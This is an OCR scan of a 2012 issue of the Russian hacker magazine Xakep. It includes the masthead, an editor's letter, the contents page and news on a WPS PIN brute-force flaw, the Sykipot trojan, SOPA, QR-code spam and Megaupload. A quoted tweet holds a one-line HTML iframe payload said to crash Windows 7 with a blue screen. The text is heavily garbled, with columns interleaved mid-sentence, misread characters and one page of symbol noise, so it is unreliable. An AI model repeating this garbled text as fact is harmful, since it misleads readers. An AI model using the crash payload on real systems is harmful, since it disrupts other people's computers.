Xakep 03_2012

Page 1

Исчерпывающий гид по шоппингу в китайских интернет-магазинах



_.....

-пF.нЕР РЕДАКЦИЯ Главный редактор

Никита (<nikitozz)) Кислицин

Шеф-редактор

Степан ((step)) Ильин lstepfareal.xakep.ru ) Николай ((gorl)) Андреев [ gorlumrarea l. xakep . гu l

Выпускающий редактор

[nikitoziOreal.xakep ru )

Редакторы рубрик

PC_ZONE и UNITS

Степан ((step)) Ильин

взлом

РR-директор

Маг (maggiOreal.xakep.ru ) Андрей ((Andrushock» Матвеев landrushockiOreal.xakep.ru ] Александр «Dr. Кlouniz» Лозовский lalexanderlё!real.xakeo . ru] Николай <<gогi>>Андреев [gorlumffireal.xakep.ru J Анна Г риrорьева [grigorievafaglc.ru ]

Литературный редактор

Елена Болотникова

UNIXOIO и SYN/ACK MALWARE КОДИНГ

lstep@real.xakep.ru)

DVD Выпускающий редактор

Антон с<аnt>>Жуков

Uniх-раздел Security - paздeл

Андрей «Andrushock" Матвеев [andrushockffireal.xakep.ru ) Дмитрий «01g1 >>Евдокимов fevdokimovds@gmail.com)

Монтаж видео

Максим Трубицын

(antrareal xakep.ru ]

ART Арт-директор

Алик Вайнер 1~1

Дизайнер

Егор Пономарев

Верстальщик

Вера Светлых

Иллюстрация на обложке

Александр Брички н

PUBLISHING Учредитель

000 «Г ей м Лэнд>>, 115280, Москва, 5 этаж, офис N<> 21. Т ел.: (4951935-7034, факс: (4951545-0906

у л. Ленинская Слобода, 19, Омега nлаза,

ПРИВЕТ С АНТАРКТИДЫ

Генеральныйдиректор

Дмитрий Агарунов

Генеральный издатель

Андрей Михайлюк

Финансовый директор

Андрей Фатеркин

Директор по маркетингу

Елена Каркашадзе

Управляющий арт ·директор

Алик Вайнер

Главныйдизайнер

Энди Тернбулл

Директор по nроизводству

Сергей Кучерявый

РАЗМЕЩЕНИЕ РЕКЛАМЫ

Две недели назад получил особенное электронное письмо, которое меняпо-хорошемутронуло и заставило задуматься о вечном. Писал

Т ел.: (4951935-7034, факс: (4951545 -0906

РЕКЛАМНЫЙ ОТДЕЛ

СерегаСильнов-редактор рубрики «Фри кинг >>, который еще

Директор груnnы TECHNOLOGY

в прошлом годуотправился в научную экспедицию вднтактиду.

Старшие менеджеры

Письмо стало особенны м, потому что отправлено почти с южного полюса и передано по коротковолновой связи со скоростью бод через

-50 неком мерческую радиолюбительскую сеть Wl NLl NK.

В письме Сергей передавал приветы и рассказывал о своих впе­ чатлениях , которые в таком необычном месте рождаются от самых простых вещей.

Менеджер Директор корпоративной группы Старший менеджер Менеджер Старший трафик·менеджер

Марина Филатова (filatovaiOglc.гu l Ольга Емельянцева ( olgaemiiOglc . гu l Оксана Алехина falekhinaraglc.rul Елена Поликарпова ( polika r povalё!glc.ru ) [работа с рекламными агентствами] Кристина Т атаренкова [tatarenkovafOglc.ru ] Юлия Г ос подинова f gospoфnova fOglc . ru ] Мария Дубровская (dubгovskayaiOglc гu l Марья Буланова [ bulanovaГclglc:.ru )

ОТДЕЛРЕАЛИЭАЦИИСПЕЦПРОЕКТОВ

Впрочем, вся эта романтика была лишь сопутствующей вещью для

Директор

Александр Коренфельд l koгenfeldiOglc. гu l

Сергея, ведь он приехал туда в составе экспедиции, которая должна

Менеджеры

Светлана Мюллер Наталия Тулинова

была пробурить 3 768 метров льда и ответственно дотян уться до подледного озера Восток, не навредив ему. Озеро действитель­

РАСПРОСТРАНЕНИЕ

но огромное:

Директор по дистрибуции

Кошелева Татьяна

Руководитель отдела nодпис ки

Клепикова Виктория Oepikovalё!glc. ru )

250 километров

в длину, 50-в ширин у, и до 1.2-в

глубину. Учи тывая , что оно было изолировано от внешнего мира сотни тысяч лет, вопросы об обитающих в этом озере формах жизни и о том, что вообще там происходит, -ч ертовски интересны: до­ стоверно об этом человечеству ничего не известно . Не так уж много

осталось на планетенеизученных уголков,- и вот озеро Восток являетсяоднимиэтаких объектов.

Какова же была моя радость, когда сегодня [5 февраля) я прочел но­

[koshelevalaglc.ru l

Руководитель

Лукичева Наталья Hukichevafaglc.ru ]

спецрасnространен и я

Претензии и дополнительная ин фа: В случае возникновения вопросов по качеству печати и ОVО-дисков: claimlё!glc.ru . Горячая линия по подnиске

Факсдля отправки купонов и квитанций на новые подписки:

[495] 545-09-06

Телефон отдела подnискидля жителей Москвы: [495) 663-82-77 Т елефон для жителей регионов и для звонков с мобильных телефонов: 8-800-200-3-999

вость о том, что российская экспедиция достигла ус пе ха идоб урила

Дnя nисем:

эту скважину, реализовав проект, длившийся более

Зарегистрировано в Министерстве Российской Федерации по делам nечати, телерадиовещанию

30 лет! Чертов­

ски горд за Сергея и его коллег-российских ученых, работающих в этой экспедиции и решившихтакую сложную задачу! Выполняю

его просьбу: передаю привет всем читателям Х с Антарктиды : ).

101000, Москва, Главnочтамт, а/я 652, Хакер

и средствам массовых коммуникаций ПИЯ Отпечатано в тиnографии

77-11802

от 14.02.2002.

Scanweb, Финляндия. Т и раж 219 833 экземпляров.

Мнение редакции не обязательно совпадаете мнением авторов. Все материалы в номере

P.S.

Сергей обещал сделать фотографию с вытоптанным в снегу

на фоне полярной станции логотипом Хакера. Ждем его возвра­

щения:).

предоставляются как информация к размышлению. Лица, использующиеданную информацию в nротивозаконных целях, могут быть nривлечены к ответственности. Редакция не несет ответ­ ственности за содержание рекламных объявлений в номере.За nереnечатку наших материалов без спроса- nреследуем.

По воnросам лицензирования и nолучения nрав на использование редакционных материалов

nikitozz, rn. ре д. Х shop.glc.ru/xakep vkontakte.ru/xakep mag

ХАКЕР

03/158/2012

журнала обращайтесь по адресу: contentragtc.ru .

© 000 «ГеймЛзнд», РФ, 2012

001


Content MEGANEWS

016

Колонка Степы Ильинна

017

Proof-of-concept

О хранении паралей

Все новое за последний месяц

011

hacker tweets Хак-сценавтви ттер е

РЕГУЛЯРНО ПОЛЬЗУЮТСЯ

008

HEADER 004

1АМИЛЛИНОВАМЕРИКАНЦЕВ

ТЕХНОЛОГИЕЙ ОR-КОДОВ

За дач а: собрать интересные данные с PasteЬin . com

COVERSTORY

030

Большая охота Интервью с ведущим хед­ хантером рунета

COVERSTORY

COVERSTORY

018

02,

Ломаем Wi-Fi

Расщепляй и

за

властвуй

10 часов Получаем WPAключ для Wi-Fi с

Уязвимости рас-

помощью уязви-

са и внедрения

мой технологии

заголовков в со-

WPS

временном вебе

щепления за про-


048

038

PCZONE

-

UNIXOID

В Китай за покупками?

104

Свободачерезизоляцию

108

Федоринасча ст ье

Из чего состоят безопасные Liпuх - дистрибутивы

Семь китайских интернет-магазинов со всякой всячиной

042

Проверка на прочность

Мини-обзор заслуживаю щ их внимания изме н е н ий

Тестируем универсальную распознавалку САР Т СНА

048

Фреймворкдля пентестера

в последних версиях F edoгa

Тестируем безопасность веб-приложения с помощью

11 О

wЗaf

052

Интегрируем Liпux и <<облачные» сервисы

взлом

-

SYN/ACK

Easy-Hack

114

В поискахинсайдера

120

Корпоративныесвязи

Борьба с утечками корпоративной информа ц ии

Хакерекие секреты простых вещей

056

Достучаться до небес

Обзорэксплоитов

Анализ свеженькихуязвимсетей

Опенсорсные решения для централизованного

062

РНР - бот для

управления доступом к ресурсам

066

1сап сгасk it!

Создаем высокопроизводительный сайт

Решение заданий для хак-конкурса, учрежденного

с использованием

Windows

Кодим бота для распределенных вычислений

124

Испытаниенагрузкой

nginx и Django

Управлением правительстве н ной связи

Великобритании

070

Фальшивые

SMS: похудей за 30 дней!

Всяподного т ная известноголохетро н а

074

X-Too ls

-

FERRUM

130

От <<винта » ! Тестирование внешних жесткихдисков с

Программы для взлома

136

Ed i f i eг

WEXLER.BOOKТ7055

USB 3.0

R2500

Обзор универсальной активной стереосистемы

-

MALWARE

138

076

Веселая тройкабуткитов

-

И шве ц , и жнец, и на дуде игрец с ц ве т ным

Самыетехнологичные угрозы

2011

года

в веселых картинках

082

Малварьдля мобильных << окошек »

Исследуем модель безопасности п опулярной ОС д лясмартфоновнапрактике

КОДИНГ 088

Формграббердля

FAQUNIТED

143

Диско

144

8.5 Гб всякой WWW2

Google Chгome

Расширяем возможности препроцессора С/С++ с помощ ь ю сторо н него кодегенератора

096

3адачинасобеседованиях П одборкаинтересныхзаданий,которыедают на собеседованиях

100

Паттерны проектирования <<Адаптер» и «Фасад» Меняем и н терфейсы классов без ущерба для з д оровья

Большой

FAQ всячины

Удобные wеЬ-сервисы

и способ их перехвата в браузе ре от Google И целого Си мало

юниты

140

Исследуем отправку зашифрованных форм

094

сенсор н ым дисплеем

110

2.0


MEGANEWS НОВАЯ ДЫРКА В WPS ОБЛЕГЧАЕТЗАДАЧУХАКЕРАМ БРУТФОРСИМ ЛЕГКО И БЫСТРО

GOOGLE ОБВИНЯЮТ В НАРУШЕНИИ ШЕСТИ ПАТЕНТОВ. Истцом выстуnает Bг i t i sh

Telecom -одна из круnне й ших в мире телекоммуникационных комnаний.

ТРОЯ Н ОХОТИТСЯ НА С МАРТ-КАРТЫ ВОЕННЫХ МАЛВАРЬ, ИСПОЛЬЗОВАВШАЯСЯ ДЛЯ АРТ -АТАК,

н

еприя т нуюуязвимостьна­

шел в с т андарте

СМЕНИЛА ПРОФИЛЬ

WPS [Wi- Fi

Pгotected Setupl исследо­

ватель в области информационной безопасности Стефан В и бок, о чем и поспе ш и л уве д омить U S-CERТ. Д ырка присутствует в продуктах мно­ гих популярных брендов, в том числе

0-Link, Netgeaг, Linksys и Buffalo. Она позволяет ощутимо сократить время,

уходящее на брутфорс РIN-кода, который необходим для установки беспроводного роутера. В результате о ш ибки к атакующему возвращается слишком много информации о РIN­ коде, а сам он становится слабее, что не г ативно влияет на защиту

тысяч, если не миллионов

Wi-Fi-

ма ршр у т изаторов и точек дост упа.

В

а

US-C ERT поясняют: «Если

nроверка

D

троянце

Sykipot, казалось бы,

нет ничего особен­

ного- малварь, ориен т ирова нн ая на п охищение

данных о смарт-картах, не нова . Но не каждый

деньувидишь малварь, цель которой - смарт-карты

сотрудников Министерства обороны С Ш А и п олучение с их помо щ ьюнесанкционированного д оступа к о г ра­

ниченным ресурсам. Именно т акие модификации в коде

по д линности РIN-кода завершилась

Sykipot обнаружили специалисты

неуда ч но, точка доступа посылает

Одна из новых функций троянца обеспечи в ает взаимо­

сообще н ие

действие с ПО

EA P-NACK н азад клиенту.

компании

Activ ldentity ActivC ii ent,

AlienVault.

к от орое как раз

Эти сообщения пересылают ся таким

работает со смарт-картами, соо т ветс т вующими ста н дар­

образом,чтохакеруудаетсяопреде­

там безопаснос т и Минобороны С Ш А. В американском

лить, является ли первая половина

Минобороны такие карточки использую т ся для хранения

РI N - ко д а в ер н ой. Пос л едняя цифра

цифровых сертификатов рабо т ников и их РI N-ко д о в , nри­

Отметим, что ни один

уже известна, так как она являет-

ме н яемыхдля аутентификации. В резул ьт атетехнического

из производителей,

ся кон т рольной суммой РIN-кода.

анализа специалистам

В се это зна ч ительно сокращает

новый вариант кода скомпи л ирован е щ е в марте

мости, не выпустил

количес т во п опыток, требуемыхдля

но он до сих пор был не слишком широко распространен.

ее исправление .

усnеш н ого брутфорса: о н о снижается

Он способен перехватыватьданные о сер т ификатах и п ри

продукты которых подвержены уязви­

В своей статье Вибок пишет, что лучшим

с

способом борьбы

сяч>>. По д робнее об этом ты можешь

димых РIN-кодах. После перехвата

п рочи т ать в одной из статей рубрики

краденую информацию н а защищенные р есурсы в Китае.

с дыркой на данный моментявляется

отключениеWРS .

10'8 д о 10'3 + 10'4, то есть до 11 ты­

AlienVault удалось в ыяснить, что 2011 года,

Соvе г Stогуэтого н омера.

помощи в строенного кейло г гера снимать дан н ые о в в о­

Sykipot переправляет

Э т о, в п рочем, н е говорит о т ом, что по л у ч атели да н ных тоже находятся в КНР.

@wЗ bdЗvil

<iframe height='18082563'></i causes а BSoD on \vi.n 7 х64 via

Lol!

Yota КОМПАНИЯ <<СКАРТЕЛ>>

ПОРТЫ СТАНДАРТАUSВЗ.О

ПРОИЗВОДИТЕЛЬ LINUX-

СКОРО, наконец, nоявятся

ДИСТРИБУТИВАМАNDRIVА,

WINDOWSPHONE MARKETPLACE nерешагнул

KOMAHДAIPHONE DEV-ТЕАМ,

(БРЕНД УОТА) ЗАПУСТИЛА В НОВОСИБИРСКЕ nервую

на смартфонах и nланше-

контролируемый российским

отметкув50тысячnри-

джейлбрейк nод iOS 5.01 для

сеть

LTE в России . Сейчас

тах.ПоинформациисСЕS,

фондом

ложений. На это магазину

iPhone45 и iPad 2. За nервые

сеть включает6З базовые

nроизойдет это в конце 2012-

объявить о банкротстве.

nонадобилось14месяцев

тридняутилитускачало

станции, но к марту их уже

го или в начале 2013 года.

Увы, дела у комnании совсем

(Andгoid Maгket в свое время

более одного миллиона

nлохи .

nотребовалось 19).

человек .

станет150.

001,

NGI, скоро может

наконец-то, выnустила

ХАКЕР

03 /158/ 2012


...;;; N

N

..; ш

u u

~

1-

=il

:J: а..

о

LO

u :..: < :!Е

х

LO

:!Е L-

:J: ш

:..: :s: а..

LO

~

:J: ш

11ш

а..

~ :s: u

< :!Е ~ :!Е

ш ш а..

:!Е

ш

а а..

1:J:

о

:..:

g 1:: о

:J: ш

с:

111

о

1-

е

. м

:s:

Реклама . Товар произведен в соответствии с Техническим Регламентом на табачную продукцию.

~~dдr~~~~~r~d~~т~~ r~~~~~ ~rrд~~rrжд~rт:

~ ~rt~~t ~rtд~т ~~шtм~ dд~r~~ью


MEGANEWS

23% МИРОВОГО ОБЪЕМА ВЫПУСКА ФЛЭШ-ПАМЯТИ NAND скупила в четвертом квартале прошлого года Apple.

ПЛАНШЕТ, ПРИСТАВКА ИЛИ ЧТО-ТО ДРУГОЕ? СМЕЛЫЙ КОНЦЕПТ ОТ RAZER

nредварительно озвученыследую­ щиетехнические ха­

рактеристики : экран

размером 10,1дюйма

и разрешением 1280 х 800 пикселей , много­ канальнаязвуковая

подсистема Dolby

7.11п роектируемая вместесТНХI. сред­ ства беспроводного подключения

Wi-Fi802.11b/g/n и Bluetooth 3.0. Планиру ется также

РАССМОТРЕНИЕSОРА И РIРАОТЛОЖЕНО О МАСШТАБНОЙ ОНЛАЙНОВОЙ АКЦИИ ПРОТЕСТА И ЕЕ РЕЗУЛЬТАТАХ

m

ы уже рассказывали о «чудесны х» американских

зако н о nр оектах SOPA IStop Online Р iгасу Act] и

PIPA IPROTECT lntellectual Р горегtу Act], nородивших

волну негодования не только на Заnаде, но по всем у миру. Для

тех. ктоумудрился все про nустить. напоминаем: зако нопро ­

екты обязывают всех у ч астни ков се ти интернет lпровай деры, хос тинги , п оиско вы е с и с темы и пр.] по первомутребованию правообладателя !без решения суда] удалять пиратский контент и прекращатьлюбые вза имоотно шения с nират­

использоватьаксе­

екими сер в исам и. Платежные системы обязаны отключить

лерометры и сенсор­

в озможность перев ода д е н е г, поисковики -удалить ссылки

ный экран .

на сайты и т. д . В случае невыполнения эт ихтребований ты считаешься соучастником и твой сайт могуттакже закрыть без суда и следствия. Кстати, иностранные сайты, сервера

которых расположены в США. будут нести такую же ответ­ ственность за нелегальный контент, как если бы они бы ли учреждены в Штат ах. Б олее подробно с законо nроектами и их возможными последствиями можно ознакомиться хо тя

бы в В икипедии, а нас сей час больше интересуют n осле д ­ ствия. П оняв, что «СО ПАблизка », крупные американские

корnорации ощу т или угрозу для себя любимых . За дра ко­ новские меры выступили, к пример у, М РАА, RIAA и альянс BSA !членами которого являются Microsoft, Apple, Adobe, lпt el и т. д.]. Зато против выеказались Google. Twitteг, Mozi lla, Facebook, Yahoo, еВ ау и дру гие представители интернет­

в

м ериканекая компания Rаzегхорошо известна во всем мире !в том чис­

индустрии. Чем ближе становился « деньХ », на который было

ле и в России] как производитель периферийных игровых устройств

запланированор ас смотре ние зако нопроектов в Конгресс~

и принадлежностей. И нужно заметить, хороших- пока я п ишу эту но­

тем больше накаляли с ь с тра сти. В осемна дцат ого января

вость, моя рука как раз лежит на мышке от былоувидеть

Project Fiоnа-проект,

Razer. Тем

интереснее и неожиданнее

над которым в комnании работаютсейчас

и который был nредставлен на выставке

CES 2012.

Эта концеnция nредставляет

в интернете прошла, пожалуй, самая массовая онлайновая акция протеста за все время его су ществования. Англоя­ зычная Википедия nровела самый масштабный в истории

собой игровой nланшет, ориентированный на игры, на иболее nоnулярные сей­

опрос, nодавляющее большинство участников ко то рого

час на ПК. то есть на игры <<nрожорливые>> и мощ ные . Ус т ройство nланируется

поддержало отключение англоязычного раздела на су тки

оснастить «интуитивными элементами уnравления» !кнопками и аналоговыми

в знак протеста.

джойстиками] с силовой обратной связью. Где именно и как они будут расnоло ­

свойлоготип черным прямоугольником цензуры . Поддержа­

жены, хорошо видно на иллюстрации. А гла вн ое, основой Pгoject

ли протести в WoгdPгess. В целом к акции протеста Ыackout

стать nроцессор lпtel Соге

примкнулитысячи сайтов по всему миру. Н еспадко пришло сь

с нехваткой игр для планшета- идея заключается в том, что практически все

и сторонникам SOPA. Та к. крупнейший в мире регистратор GoDaddy, nоддерживавший SOPA, подвергся жес т комубой­

Fi ona должен i7 третьего поколения. Заявлено, что по этому вопро­ су компания тесно сотрудничаете lntel. Этот ходдолжен устрани т ь проблему

Reddit приостановил работу. Google прикрыл

существующие игры смогут работать на устройстве без какой-либо nеределки

котуса сторо ны интернет-сообщества: пользователи приня­

или доработки. Ты скаже ш ь. чт о этотолько концепт. и будешь не прав. Специа­

ли сь тысячами у водить с вои домены от GoDaddy. Регистратор

листы Rаzегпочти готовы показать работающие образцы. Предполагается, что

оцени л ситуацию и поспешил отказатьс я отсвоих слов,

поставки устройства начнутся уже в четвертом квартале текущего года. Стоить

но по зже в интервью TechCrunch выя с нил ось. что

планшет должен не более $1000.

nо-nрежнему поддерживаетSОРА ... В общем , отт ок дом е нов

GoDadd y

продол жается и сейчас. Сдался nоддавлением народного негодования и альянс

ВЗЛОМАН КРУПНЕЙШИЙ ОБУВНОЙ ИНТЕРНЕТ-МАГАЗИН В США.

BSA, заявивший , что SOPA «требует доработки ». П отом, уловив тенденцию. «пере д ум али » и сенаторы, ратовавшие

за а нт ипиратские законоnроекты. В осем ь американских

законо дате л ейотк а за лись п оддерживать SOPA nосле

18

ZAPPOS.COM УВЕДОМИЛ 2' МЛН

января и Ыackout'a, некоторые и вовсе встали на сторону

КЛИЕНТОВ О ТОМ, ЧТО БД МА­ ГАЗИНА ВЗЛОМАНА И ИНФОР­ МАЦИЯ О НИХ МОГЛА ПОПАСТЬ В РУКИ ХАКЕРОВ

начально nр е дставивший законоnроектSО РА . отозвал его,

006

протестующих. И что в и т оге? Конгрессмен Ламар Смит, из­ при знав, что в нынешнем виде закон не можетбыть принят.

Рассмотрение зако н оnроек та было отложено.

PIPA nо­

сти гла та же участь. Можно ли на з вать это nобедой ? Вряд ли. Л оббисты и копирасты рассержены, н о останав лива ться они несобираются,полагая,чтосенаторов«затерроризировала бло г осфера». Теперьлоббист ы намере ны немного nересмо­

треть n о д ход к пробл еме. Звучит зловеще.

ХАКЕР

03/158/2012


7 ФИШЕК

BUFFALO CLOUDSTATION Собственный облачный сервер Buffalo CloudStation- это не NAS. Хранилище

традиционный

Удобный бэкап Традиционно для решений

nросто

nозволяет

легко организовывать удаленный дост уn к

данным через интернет nрактически с любых

Производительная

устройств: как со стационарного комnьютера,

конфигурация

так и с мобильных девайсов.

Buffalo

бэкаn данных с клиентских машин

Несмотря на комnактные размеры

орагниэовывается очень nросто. При

[15Dx175x45 ммl , сетевое хранилище

этом nоддерживается как так и МАС

05.

Windows,

оснащено довольно nрои зводитель­

Ус тро йство nоль-

ным же л езом, которое nозволяет не

ностью совместимо с эnnловской технологией

только организовать быстрый сете­ вой достуn к файлам, но и реализо-

Time Machine.

вать другие nолезные функции.

Встроенный

Припожения дпя

BitTorrent-клиeнт

iOS и Android Приложение

Webaccess

Как и большинство современных NAS'oв,

соз­

Buffa lo

оснащен встро­

дано для удаленного дост у nа

CloudStation

с мобильных ус тр ойств к дан­

ен ным ВitТоггеnt-клиентом с

ным, хранящИмся на решениях

удобным wеЬ-интерфейсом.

фирмы

Эту функцию по достоинству

Bu ffalo.

Одновременно

nоддерживается несколько

оценят любители интенсивно­

хра нилищ, а само nриложение

го р2р-обмена: качать торрен­

умее т работать с файлами в сех nоnулярных форматов: от ви­ део, фотографий и музыки до раз ноформатны х д окументов.

ты станет в разы удобней.

Перекодировка

Большой объем

медиафайлов

и энергоэффективность

Bu ffalo CloudStation

умеет авто -

матически кодировать весь виде­ оконтент в нужном размере nри

удаленном достуnе с мобильных устройств. Та ким образом, можно удобно смотреть, наnример, видео на айфоне, не задумываясь

о nерекодировке файлов.

Устройство nозволяет разместить в себе один диск от

1 до 2 Тб.

SATA-11

объемом

Среднее энерго­

n отребление nри этом не буде т nревышать

26

Вт. При текущих

расценках на э лектроэнергию , в

год это nозволяет экономить до

4

тысяч рублей, если сравнивать с обычным ПК .

ХАКЕР

03/158/2012

007


MEGANEWS

ИНДОНЕЗИЙСКИЙ ХАКЕР HMEI7 дефейснул сразу шесть доменов верхнего уровня , принадлежащих компании S i emeпs.

QR-КОДЫ МОГУТ БЫТЬ ОПАСНЫ

MEGAUPLOAD

КИБЕРПРЕСТУПНИКАМ ТОЖЕ НРАВЯТСЯ НОВЫЕ ТЕХНОЛОГИИ

ФБРЗАКРЫЛООДИН ИЗ КРУПНЕЙШИХ ФАЙЛООБМЕННИКОВ

о

ВСЕ

пасный прецедент создан в С Ш А-ФБР закрыло

один из крупнейших Файлаобменников в сети

Megaupload, генерировавший, no его собствен­ 4% всего интернет-трафика. Похоже

ным данным, около

n

на заголовок <<желтой>> новости , но, увы, это реальность.

рактически все интересныетехнологические новинки рано или поздно оказываются «на служ­

По запросу американских спецслужб в Н овой Зеландии

бе» у криминала. Н е избежали этой участи и

также были арестованы основатель nроекта Ким

QR-

продаж смартфонов , планшетов и других мобильных

ное заключение

девайсов.

чество,

Специалисты

Dotcom

Шмитц и еще три человека. Каждому из них грозиттюрем­

коды,популярностькоторыхрастетвместесувеличением

Websense ThгeatSeekeг Netwoгk об­

no трем обвинениям: 20 лет за мошенни­ 20 лет за отмывание денег и по пять лет за каждый

случай нарушения копирайта! Помимо этого, выдвинуты

обвинения nротив трех граждан других стран. Эти люди

наружили сп а м-сообщения, ссылающиеся на страницы со вс т роенными QR-кодам и. П о всей в идимости, так с па­

имели отношение к проектам компании. П о мнению

меры обходят спам-фильтры и пытаются заставить nоль­

Де n артамента юстиции С Ш А,

зователей открывать ссылки именно с помощью мобиль­

распространению пиратского контента . За пять лет рабо­

ных устройств. Сп а м выглядит как традиционная реклама

ты он якобы нанес индустрии развлечений ущерб в раз­

фар мы и содержитссылку на сайт 2tag .nl -

мере $500 млн в виде недоnолученной прибыли . Кроме

в полне легаль­

ный сервис, позволяющий создавать QR - ко д ы для

того, файлаобменник породил <<криминальные денежные

URL-

потоки>> !от рекламы и продажи премиум-аккаунтовl насумму$175м л н.

aдpecoв. Как только пользователь перехо д и т п о ссылке,

на экране отображается QR-код, а сnрава от него - адрес. Когда nользователь считывает QR-код, его устройство либо автоматически nереходит no зашифрованному адре­

су, либо сnрашиваету юзера разрешение lв зависимости от версии QR-читалкиl . Эту особенность ле г ко можно ис­ пользовать для распространения специфич н ой малвари

через уязвимостивмобильных браузерах : ведь обы ч но эти коды сканируют именно с помощью смартфонов . Увы, этот «виток эволюции>> в атаках на мобильные девайсы предсказывали многие аналитики.

Megaupload сnособствовал

а

Уже nоследовала реакция других ресурсов с аналогич­

Поданным к омпа­ ни ис оm5соге , 14 м лн амери к анцев

в возрасте от

18

ным функционалом : к nримеру, известный хостинг-сервис

FileSonic объявил о полном

отключении файлаобменного

до З4л е тр е гулярно

функцианала !составляющего, заметим, его суть) : теперь

используют

скачивать контент, загруженный другими nользователя­

свои мобильные

у с т ро й ства дл я чтен и я QR -к одов . А ведь ещ е недавно QR- к оды были по­ пулярн ы в осно вн о м

н а Восто ке.

ми, невозможно.

Отреагировала и «сетевая оппозиция>>-Апоnуmоus атаковали сайты ФБР, Минюста США , Белого дома,

RIAA,

М РАА и ресурсы прочих организаций, из-за действий которых был закрыт файлаобменный сервис.

THUNDERBOLTтм

оов

ИНТЕРФЕЙСТНUNDЕRВОLТСКОРОДОБЕРЕТСЯДОПК

РЯДНЕБОЛЬШИХКОММЕРЧЕ­

ANDROIDINVASIONCOCCЫЛKOЙ

HAБAЗEWINDOWS. Этy радостную весть сообщаетнам

СКИХ IPV6-CETEЙ пла ниру­

НАПРОГРАММИСТАGООGLЕСО­

издание DigiTime. По информации источника (данные о ко­

ется развернуть в Китае

ОБЩАЕТ, что Googl e в с кором

тором не раскрываются) , ряд << железных » гигантов, таких

к концу201 3 года. А уже

будущем м ожет начать вы ­

какSопу, Asus, Gigabyte Technologyи ASRock, уже активно

в

пуск м обильны х n р оце с сорав

внедряетТhundегЬоlt в свои nродукты. Новое железо

в Поднебесной стандартным

nод с обственнымтов а рны м

должно добраться до рынка в апрелетекущего года .

nрото к олом .

з нако м.

2015 году 1Рv6должен стать

ХА КЕ Р

03 / 158/2012


итоги

IGRDUPiB

КОНКУРСА НАСТАЛО ВРЕМЯ ПОДВЕДЕНИЯ ИТОГОВ НАШЕГО КОНКУРСА, КОТОРЫЙ МЫ ПРОВОДИЛИ СОВМЕСТНО С КОМПАНИЕЙ GROUP-IB, СПЕЦИАЛИЭИРУЮЩЕЙСЯ НА РАССЛЕДОВАНИИ ИНЦИДЕНТОВ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ. Напомним, в рамках соревнования было необходимо провести расследование сразу двух !Т-инцидентов: утечки конфиденциальных данных на предприятии, а так же взлома сервера на базе Liпux.

Победителями конкурса являются [в алфавитном порядке):

КОНСТАНТИН ИЛЬИН

~Еонид WАнин

ст дент 5 курса Физико-технического

Род занятий:

У

института

НТУУ "Киевский политех-

нический институт", Киев.

Комментарии nобедитеnя:

«Конку рс понравился, провед

е н на высоком техниче­

шил после знакомства

с ком ~ровне. Прдинятdь уч~~:~и~~сь хорошее впечатле­ с фреимворком

па пе,

ние о квалификации организаторов».

К сожале нию, обе щанный приз [трудоустройство в

Отчеты победителей

Group-IBI не подошел ни одному из победителей:

опубликованы на нашем сайте:

Константин учится в Киеве и пока не может переехать

www. xakep.ru/post/58241 1

в Москву, а Леонида полностью ус траивает и текущее место работы . Тем не менее, чтобы все было честно, мы

награждаем победителей ценными призами: каждый получает по

iPad 2 Wi-Fi

ЗG

16Gb.

Будь с нами! Стань одним из нас!


MEGANEWS

FАСЕВООКВЫПУСТИЛ СО6СТВЕННЫЙ МЕССЕДЖЕР для Windows, а ВКонтактетем временем те с тируетсерв и с видеозвонков

ДВАДЦАТЬ СЕМЬ СТЕКЛЯННЫХДЮЙМОВ НОВИНКА ОТ SAMSUNG НА РLS·МАТРИЦЕ

н

а прошед ш ей не д авно в Лас-Вегасе выставке

СЕ5

2012 свои

последние разработки продемон ­

стрировали топо в ые производители <<железа»

со всего мира. Интересного на СЕ5было много, но пере­ числить все мы, к сожалению, не имеем возможности, так

что придется ограничиться малы м. Одной из самых ярких новинок, пре д ставлен н ых на выставке, стал мони т ор

527В970 о т компании 5amsuпg, продолжающий 9-ю премиум - серию. Этот 27-дюймовый агрегат интересен

тем , что он работает на основе технологии PL5 IPiaпe L iпe 5witchingl. П о сути, это аналог IP5 lln-Piane 5witchingl oт5amsung . Так как I Р5-матрицы на данный момент являются <<вершиной пищевой цепи», эта старая-новая т ехноло г ия заи н тересовала многих.

П ервый блин

y5amsung,

однако, вышел комом: два мо­

нитора на РL5-матрице, представленные в прошлом году, обладали букетом всех возможныхдефектов сборки, были помещены в корпус из д овольнодешевого пластика и в

результа т е имели засве т ы, битые пиксели и т. п. П охоже, тепер ь 5amsuпg решил а ис пр авить э т от промах.

Мо д ель 527 В 970 выпо л нена в соли д ном и одновре­ менно с в ерхтонком корпусе, а все элементы управления

помещены в эргономичную алюминиевую подставку !там же нахо д ятся порты ввода - вывода и U 5 В -концентраторl , регулируемую по высоте. Д иапазон регулирования монитора 9-й серии по высо т е составляет

10 см,

плюс его

можно н а клонять. П а н ел ь имеет ультравысокую четкость

QHD 12560 х 14401, поддерживаеттехнологии Display P oгt, Dual L iпk - DVI и Н DMI, а также оснащена стереодинамика ­ ми мощностью 7 Вт и интерфейсом MoЬile High Defiпition Link IM HLI д ля п одключения смартфонов и планшетных П К. Устройство п о дд ерживает эксклюзивную технологию

5amsung

Nat uг al Соlог Е х р ег t , к в озмож н ост я м которой

относитс я аппаратная ка л ибровка цветов. 527 В 970

же <<эффект мокрой тряпки >> !, который часто проявляе т ся

способен отображать более миллиарда оттенков, что

дажеутоповых современных дисплеев. Так как <<кристал­

гарантирует высокий реализм и качество при отображе­

лический эффект>> напрямую обусловлен матовостью па­

нии фотографий и ви д еороликов, сделанных с помощью

нели, у глянцевых мониторов он фактически отсутствует.

цифровой фо т о- или видеокамеры. Кстати, пресс-релиз

Здесь стоит заметить, что и первые образцы на базе

обещае т, что инже н еры 5amsuпg вруч н ую будут на­

вызвали немалое оживление утех, для кого прежде всего

страи в ать ц ветопере д ачу к аждого монитора серии

9

PL5

Яр кость: 300 кд/м 2 Равномерность )мин .): 90% К он т растность (статичес к ая) :

1000:1 Время отклика

(GTG): 5 м с Угол обзора (гор/верт.) : 178°/1 78°

в аж н о комфорт н ое для глаз изображение, все по той же

на окончательном этапе сборки. Кроме то г о , вся площадь

причине : РL5 - дисплеи с матовым экраном практически

дисплея также снабжена антибликовым стеклянным 111

не проявляли <<кристаллическо г о эффекта>>.

покрытием. Да-да, с т арое доброе стекло с антибликом,

Р а зрешение : 2560х 1440 Глуб ин а цвета : 1,07 млн цветов

Ожидается, что новинка поступит в продажууже в мар­

давненько мы такого не видели. Этот последний нюанс

те текущего года lк сожалению, неизвестно, появится ли

